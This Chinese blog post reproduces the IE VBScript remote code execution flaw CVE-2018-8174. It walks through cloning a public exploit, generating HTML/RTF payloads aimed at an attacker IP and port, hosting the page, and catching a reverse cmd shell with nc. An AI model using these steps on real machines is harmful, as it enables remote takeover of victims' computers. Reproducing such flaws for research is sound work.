1. 程式人生 > >CVE-2018-8174 IE瀏覽器遠端程式碼執行漏洞

CVE-2018-8174 IE瀏覽器遠端程式碼執行漏洞

0x00漏洞簡介

在2018年5月9日的時候360發表了一份apt攻擊分析及溯源報告 文中提到了cve-2018-8174這個漏洞的首次在apt方面的應用

原文地址:http://www.4hou.com/vulnerable/11441.html

CVE2018-8174這個漏洞是針對ie瀏覽器的一個遠端程式碼執行漏洞

CVE地址:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8174

這個漏洞的影響範圍為

A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory, aka "Windows VBScript Engine Remote Code Execution Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.

基本上影響了所有的高版本windows

漏洞細節已經有很多大佬已經寫出來了 此處不過多描述了

比如https://www.freebuf.com/vuls/172983.html

0x01復現過程

首先到github上面找exp

https://github.com/Sch01ar/CVE-2018-8174_EXP

然後克隆到本地

git clone https://github.com/Sch01ar/CVE-2018-8174_EXP

然後生成payload

python CVE-2018-8174.py -u payload的url -o rtf檔案的名字 -i ip地址 -p 埠

然後就能看到生成了兩個檔案一個html一個rtf檔案

然後把這個html扔到nginx的網站目錄下

然後啟動nc監聽剛才設定的埠

然後開啟ie瀏覽器訪問一下這個html

然後ie瀏覽器並不會正常顯示這個頁面 但是攻擊已經成功了

此時我們去看看我們的nc已經成功的拿到了反彈回來的cmd了